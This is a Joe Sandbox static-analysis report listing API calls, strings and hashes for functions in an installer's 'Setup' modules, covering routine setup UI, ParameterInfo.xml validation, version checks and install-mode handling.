                                                                                              • Opcode ID: ecb891d93cccdf360072234201aecbdf1862bef95b919dc56faa38966e711f99
                                                                                              • Instruction ID: e1b076e1a7c7f549d4ae0ae6cfb432cefdc88abae9fbacb6bfb6b0ca616acb51
                                                                                              • Opcode Fuzzy Hash: ecb891d93cccdf360072234201aecbdf1862bef95b919dc56faa38966e711f99
                                                                                              • Instruction Fuzzy Hash: E691093140428CBADB10DFB8CA44BCC77A9AF2136CF54C956A8349BB81D7B5D70DA725

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8FreeStringThrow_malloc
                                                                                              • String ID: can only have one logical or arithmietic expression for a child node$AlwaysTrue$And$Equals$Exists$GreaterThan$GreaterThanOrEqualTo$LessThan$LessThanOrEqualTo$NeverTrue$Not$ParameterInfo.xml$schema validation failure: $schema validation failure: unknown Expression:
                                                                                              • API String ID: 1924927865-100526994
                                                                                              • Opcode ID: 80c734b8aeac705cb1cc88aea5394e0e20fec56164173d4f79f1ab6ffdcdfe37
                                                                                              • Instruction ID: 0b97dcea306321295a48b0d413f71b41f4a446ed6ced9413316cb4795b5c71f2
                                                                                              • Opcode Fuzzy Hash: 80c734b8aeac705cb1cc88aea5394e0e20fec56164173d4f79f1ab6ffdcdfe37
                                                                                              • Instruction Fuzzy Hash: D502D0711083459FD720CFA8CA41B9EB7E8AF95328F110E2EF495D7B91DB30E9098762

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395BCC2
                                                                                                • Part of subcall function 63961DCD: __EH_prolog3.LIBCMT ref: 63961DD4
                                                                                                • Part of subcall function 63961DCD: GetCommandLineW.KERNEL32(00000018,6395B178,00000000,?,?,6395AC46,?), ref: 63961DD9
                                                                                              • SendMessageW.USER32(?,0000046B,00000000,00000000), ref: 6395BCDC
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 6395BCED
                                                                                              • EnableMenuItem.USER32(00000000), ref: 6395BCF4
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 6395BD04
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 6395BD15
                                                                                              • GetSystemMenu.USER32(?,00000000), ref: 6395BD21
                                                                                              • InsertMenuW.USER32(?,00000000,00000400,0000F120,00000000), ref: 6395BD5F
                                                                                              • InsertMenuW.USER32(?,00000002,00000400,0000F020,00000000), ref: 6395BDA5
                                                                                              • InsertMenuW.USER32(?,00000003,00000400,0000F00F,00000000), ref: 6395BDC3
                                                                                              • SetMenuItemBitmaps.USER32(?,0000F120,00000000,00000002,00000002), ref: 6395BDD9
                                                                                              • SetMenuItemBitmaps.USER32(?,0000F020,00000000,00000003,00000003), ref: 6395BDE5
                                                                                              • KiUserCallbackDispatcher.NTDLL(?), ref: 6395BDEA
                                                                                              • SetWindowLongW.USER32(?,000000FC,6395BF84), ref: 6395BE0C
                                                                                              • SetWindowLongW.USER32(?,000000EB,00000000), ref: 6395BE1A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$LongWindow$InsertItem$BitmapsH_prolog3System$CallbackCommandDispatcherEnableLineMessageSendUser
                                                                                              • String ID: IDS_MINIMIZE$IDS_RESTORE
                                                                                              • API String ID: 435486374-4171729070
                                                                                              • Opcode ID: 2693376ae382075a543852cbf3864145624eae6fd827daee303f2272d83fbd8f
                                                                                              • Instruction ID: e94a4b7395d0bc039dbd123767c9781507e87ea42e6b2080b0f8cf7473295e1b
                                                                                              • Opcode Fuzzy Hash: 2693376ae382075a543852cbf3864145624eae6fd827daee303f2272d83fbd8f
                                                                                              • Instruction Fuzzy Hash: 4341A03054430AAFDF20ABA4CC49FAE7BB5FF8AB14F104614F265AA1E1C771A950DF14

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 6C8C39AD: __EH_prolog3.LIBCMT ref: 6C8C39B4
                                                                                              • GetCommandLineW.KERNEL32(38D98A99,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 6C909D54
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C909EBD
                                                                                              Strings
                                                                                              • lower, xrefs: 6C909FFA
                                                                                              • ParameterInfo.xml, xrefs: 6C909E2E, 6C909F67, 6C90A096
                                                                                              • SetupVersion specified in ParameterInfo.xml is , xrefs: 6C90A029
                                                                                              • Current SetupVersion = %s, xrefs: 6C909D43
                                                                                              • SetupVersion not specified, xrefs: 6C909E1F
                                                                                              • SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version., xrefs: 6C909F44
                                                                                              • SetupVersion, xrefs: 6C909DC0
                                                                                              • Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check., xrefs: 6C909D95
                                                                                              • SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version., xrefs: 6C909F58
                                                                                              • NoSetupVersionCheck, xrefs: 6C909D6C
                                                                                              • higher, xrefs: 6C90A001, 6C90A017
                                                                                              • SetupVersion specified in ParameterInfo.xml is '%s', xrefs: 6C909EC3
                                                                                              • than the currently supported version., xrefs: 6C90A006
                                                                                              • 1.0, xrefs: 6C909D3D, 6C909D42, 6C909ED4, 6C909EFB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandException@8LineThrow
                                                                                              • String ID: than the currently supported version.$1.0$Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check.$Current SetupVersion = %s$NoSetupVersionCheck$ParameterInfo.xml$SetupVersion$SetupVersion not specified$SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version.$SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version.$SetupVersion specified in ParameterInfo.xml is $SetupVersion specified in ParameterInfo.xml is '%s'$higher$lower
                                                                                              • API String ID: 1129948358-1674238012
                                                                                              • Opcode ID: 1758c59053ecd3c89630461dc84e563cefc9964da68f499504cadaf8629a32e3
                                                                                              • Instruction ID: 444c05105f0293ee1a0be0dc5563b45430d7e80b3c5200c57388a6c2eb635091
                                                                                              • Opcode Fuzzy Hash: 1758c59053ecd3c89630461dc84e563cefc9964da68f499504cadaf8629a32e3
                                                                                              • Instruction Fuzzy Hash: D8C16C721087409FD324DB78C940A9FBBE8AF96318F140E2DF1A597B91DB74D9098B53

                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D2944
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8D2677: __EH_prolog3.LIBCMT ref: 6C8D267E
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8D2C00
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                                                              • String ID: 8$Blockers$ParameterInfo.xml$StopBlockers$SuccessBlockers$WarnBlockers$schema validation failure: More than 1 Stop Block defined.$schema validation failure: More than 1 Success Block defined.$schema validation failure: More than 1 Warning Block defined.$schema validation failure: Stop blockers has no child node$schema validation failure: Success blockers has no child node$schema validation failure: Warn blockers has no child node$schema validation failure: no valid child element found for 'Blockers' node.
                                                                                              • API String ID: 3417717588-4180151753
                                                                                              • Opcode ID: 80ce3f2ed12775cc7227ec3c0cd66cf3a48587dbd2bf08d4461e7875b4009b32
                                                                                              • Instruction ID: c5a4f33310408b3de0ac63921b0b3a560fb16a9b953d70f34a9ad9f98e04eff1
                                                                                              • Opcode Fuzzy Hash: 80ce3f2ed12775cc7227ec3c0cd66cf3a48587dbd2bf08d4461e7875b4009b32
                                                                                              • Instruction Fuzzy Hash: 9AF1A171904249EBCF24DBECCA44ADE7BB8AF15318F148969F024D7B81DB74DA09CB61

                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,6C5D27B0,00000000,6C5F0088), ref: 6C5D2D01
                                                                                              • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,6C5D27B0,00000000,6C5F0088), ref: 6C5D2D4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID: Local\SqmData_%s
                                                                                              • API String ID: 4275171209-1264235261
                                                                                              • Opcode ID: 525d109ef3d091c74afc41b4a65041a618fc9314acc00919b56478ae9f602fc1
                                                                                              • Instruction ID: 69263dc961d40c0c39ffd41d7a682219c029fdc0d18abce755b8ca40b70fe693
                                                                                              • Opcode Fuzzy Hash: 525d109ef3d091c74afc41b4a65041a618fc9314acc00919b56478ae9f602fc1
                                                                                              • Instruction Fuzzy Hash: 10B1A1706003409FDB548F25CC84F5737F5BB49348F2584A9E56ADBAA2DB71E889CF48
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63956726
                                                                                                • Part of subcall function 63951E75: __EH_prolog3.LIBCMT ref: 63951E7C
                                                                                                • Part of subcall function 63951E75: GetThreadLocale.KERNEL32(?,00000004,63956734,0000004C,0000004C,63957142,?,00000000), ref: 63951E8E
                                                                                              • PathIsRelativeW.SHLWAPI(?,0000004C,0000004C,63957142,?,00000000), ref: 63956745
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 63956751
                                                                                              • PathFileExistsW.KERNELBASE(?,?,?), ref: 63956790
                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 63956795
                                                                                              • __CxxThrowException@8.LIBCMT ref: 639568B8
                                                                                              • SendMessageW.USER32(?,00000449), ref: 639568F2
                                                                                              • CloseHandle.KERNELBASE(63978364), ref: 63956908
                                                                                              • CloseHandle.KERNEL32(63978364,?,00000000), ref: 6395691E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExistsFile$CloseH_prolog3Handle$Exception@8LocaleMessageRelativeSendThreadThrow
                                                                                              • String ID: ParameterInfo.xml$Successfuly found file %s $can't open EULA file: $^wu
                                                                                              • API String ID: 4048475142-837317394
                                                                                              • Opcode ID: 41ff3a7ab8cc61a9335f8d1c6367d4c7ce28462c3b6514e1e67f05ba15ae9ff7
                                                                                              • Instruction ID: 1649de9f290213803487d42dc80e119321e5b6e4a83adf2e20ab18c888fda467
                                                                                              • Opcode Fuzzy Hash: 41ff3a7ab8cc61a9335f8d1c6367d4c7ce28462c3b6514e1e67f05ba15ae9ff7
                                                                                              • Instruction Fuzzy Hash: C6714A72900208EFDF00DFA8C980ADEBBB8AF5AB28F148155F510BB291D734DA55CF61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395516A
                                                                                                • Part of subcall function 6395396A: __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D7DD: __EH_prolog3.LIBCMT ref: 6394D7E4
                                                                                                • Part of subcall function 6394D7DD: SysFreeString.OLEAUT32(00000000), ref: 6394D83A
                                                                                                • Part of subcall function 639525B2: __EH_prolog3.LIBCMT ref: 639525B9
                                                                                                • Part of subcall function 63953AD4: __EH_prolog3.LIBCMT ref: 63953ADB
                                                                                                • Part of subcall function 6395507E: __EH_prolog3.LIBCMT ref: 63955085
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FreeString
                                                                                              • String ID: CreateLayout$Failure$Install$NothingApplies$Repair$Static$Success$SysLink$Uninstall$UninstallPatch$~
                                                                                              • API String ID: 2872891630-930184743
                                                                                              • Opcode ID: 1db3b8c202ed956418cfd7b24a5ebcbdab09132e84faa51a2cd3273157b8a2d8
                                                                                              • Instruction ID: 015641a0f6741aaa971182778fa8041b82b8dd372ed4968b8d67ba330c62d05a
                                                                                              • Opcode Fuzzy Hash: 1db3b8c202ed956418cfd7b24a5ebcbdab09132e84faa51a2cd3273157b8a2d8
                                                                                              • Instruction Fuzzy Hash: 49927D7180024DEFDB05DBF8C944EDEBBB8AF19728F144189F165A7282DB30DA49DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CBB43
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CBDEB
                                                                                              Strings
                                                                                              • BlockingMutex, xrefs: 6C8CBC9D
                                                                                              • ParameterInfo.xml, xrefs: 6C8CBD6A
                                                                                              • DownloadInstallSetting, xrefs: 6C8CBC4B
                                                                                              • UserExperienceDataCollection, xrefs: 6C8CBBF8
                                                                                              • Using Serial Download and Install mechanism, xrefs: 6C8CBDFA
                                                                                              • Using Simultaneous Download and Install mechanism, xrefs: 6C8CBE01
                                                                                              • DisabledCommandLineSwitches, xrefs: 6C8CBB52
                                                                                              • FilesInUseSetting, xrefs: 6C8CBCEF
                                                                                              • schema validation failure: there must be a valid child element for Configuration., xrefs: 6C8CBD5C
                                                                                              • AdditionalCommandLineSwitches, xrefs: 6C8CBBA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: AdditionalCommandLineSwitches$BlockingMutex$DisabledCommandLineSwitches$DownloadInstallSetting$FilesInUseSetting$ParameterInfo.xml$UserExperienceDataCollection$Using Serial Download and Install mechanism$Using Simultaneous Download and Install mechanism$schema validation failure: there must be a valid child element for Configuration.
                                                                                              • API String ID: 2489616738-904804324
                                                                                              • Opcode ID: a32d149fa5434ebfaa979d1ea673efd4b457d0a8ae1d4d360f3b49367b1a746c
                                                                                              • Instruction ID: 19ff880ac05f6c1b35a40570c0035f7afda6d11be170b141d04f25f44ff6fe07
                                                                                              • Opcode Fuzzy Hash: a32d149fa5434ebfaa979d1ea673efd4b457d0a8ae1d4d360f3b49367b1a746c
                                                                                              • Instruction Fuzzy Hash: 3EA15F71604249EFCB14DFA8CA45AEEBBB9BF15318F144959F424E7780C734EA05CBA2
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 63957136
                                                                                                • Part of subcall function 6395671F: __EH_prolog3.LIBCMT ref: 63956726
                                                                                                • Part of subcall function 6395671F: PathIsRelativeW.SHLWAPI(?,0000004C,0000004C,63957142,?,00000000), ref: 63956745
                                                                                                • Part of subcall function 6395671F: PathFileExistsW.SHLWAPI(?), ref: 63956751
                                                                                                • Part of subcall function 6395671F: __CxxThrowException@8.LIBCMT ref: 639568B8
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 63957146
                                                                                                • Part of subcall function 6394EDAE: SetWindowTextW.USER32(?,?), ref: 6394EDC5
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 63957159
                                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,6397677E,000000FF), ref: 63957181
                                                                                                • Part of subcall function 6395F532: __EH_prolog3.LIBCMT ref: 6395F539
                                                                                                • Part of subcall function 6395F532: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,6397677E,000000FF), ref: 6395F555
                                                                                                • Part of subcall function 63956615: CreateWindowExW.USER32(00000008,tooltips_class32,00000000,80000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 63956636
                                                                                                • Part of subcall function 63956615: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,639572CF), ref: 63956648
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • SetDlgItemTextW.USER32(?,00000068,00000000), ref: 639571AF
                                                                                              • SetDlgItemTextW.USER32(?,00000069,00000000), ref: 639571E7
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 63957263
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 63957272
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 639572FC
                                                                                                • Part of subcall function 63956655: __EH_prolog3_GS.LIBCMT ref: 6395665C
                                                                                                • Part of subcall function 63956655: _memset.LIBCMT ref: 639566C3
                                                                                                • Part of subcall function 63956655: GetClientRect.USER32 ref: 639566E6
                                                                                                • Part of subcall function 63956655: SendMessageW.USER32(00000001,00000432,00000000,?), ref: 639566FC
                                                                                              • GetDlgItem.USER32(?,00000067), ref: 63957352
                                                                                                • Part of subcall function 63956655: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000040,6395730F,?,?,?,?,?,?,?,?,?), ref: 63956713
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Window$H_prolog3Text$LongPath$ClientCreateErrorExceptionException@8ExistsFileH_prolog3_LastMessageRaiseRectRelativeSendShowThrow_memset
                                                                                              • String ID: IDS_PRINT$IDS_SAVE
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6396652C
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395E93B: __EH_prolog3.LIBCMT ref: 6395E942
                                                                                              • CoInitialize.OLE32(00000000), ref: 63966596
                                                                                                • Part of subcall function 6396697A: __EH_prolog3.LIBCMT ref: 63966981
                                                                                                • Part of subcall function 6396697A: CoCreateInstance.OLE32(63947980,00000000,00000017,63947970,?,?,00000068,639665A6,?,?,?,?,63962A30,?,00000000,?), ref: 639669AC
                                                                                              • CoCreateInstance.OLE32(63947930,00000000,00000017,63947970,00000001,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?), ref: 639665BE
                                                                                              • CoUninitialize.OLE32(00000001,?,00000000,00000000,?,?,succeeded,?,?,?,63962A30,?,00000000,?,00000000,00000000), ref: 639666DE
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63966773
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CreateInstance$Exception@8H_prolog3_catchInitializeThrowUninitialize
                                                                                              • String ID: exiting function/method$Entering Function$IronMan::UiDataT<class IronMan::CCmdLineSwitches>::CreateUiDataT$UIInfo.xml$Xml Document load failure$succeeded$threw exception
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957583
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6395761F
                                                                                              • GetParent.USER32(?), ref: 6395765D
                                                                                              • SendMessageW.USER32(00000000,00000472,00000000,00000069), ref: 6395766C
                                                                                                • Part of subcall function 639512AB: CloseHandle.KERNEL32(?,?,6395BB96), ref: 639512BC
                                                                                              • GetParent.USER32(?), ref: 63957682
                                                                                                • Part of subcall function 6394F415: GetDlgItem.USER32(?,00003024), ref: 6394F479
                                                                                                • Part of subcall function 6394F415: GetWindowLongW.USER32(00000000,000000EB), ref: 6394F484
                                                                                                • Part of subcall function 6394F415: SetWindowLongW.USER32(00000000,000000EB,00000001), ref: 6394F4C4
                                                                                                • Part of subcall function 639577A9: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 639577CF
                                                                                                • Part of subcall function 639683FD: _memcpy_s.LIBCMT ref: 6396844E
                                                                                                • Part of subcall function 6395FB4F: __EH_prolog3.LIBCMT ref: 6395FB56
                                                                                                • Part of subcall function 6395FB4F: GetParent.USER32(00000001), ref: 6395FB6B
                                                                                                • Part of subcall function 6395FB4F: SendMessageW.USER32(00000000,00000481,00000001,00000000), ref: 6395FB78
                                                                                                • Part of subcall function 6395FB4F: GetParent.USER32(00000001), ref: 6395FBB5
                                                                                                • Part of subcall function 6395FB4F: SendMessageW.USER32(00000000,0000047E,?,?), ref: 6395FBC1
                                                                                                • Part of subcall function 6395FB4F: GetParent.USER32(00000001), ref: 6395FBD3
                                                                                                • Part of subcall function 6395FB4F: SendMessageW.USER32(00000000,00000480,?,?), ref: 6395FBDF
                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 63957702
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 63957720
                                                                                              • SetWindowLongW.USER32(000000FF,000000F4,00000066), ref: 6395772D
                                                                                              • GetParent.USER32(000000FF), ref: 6395773C
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 63957742
                                                                                              • PostMessageW.USER32(000000FF,000006F5,00000000,00000000), ref: 63957752
                                                                                              Strings
                                                                                              • Failed to initialize items information. engineDataProvider.InitializeItems() returned false, xrefs: 639575AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ParentSend$Window$Long$H_prolog3$CallbackCloseDispatcherException@8HandleItemPostTextThrowUser_memcpy_s
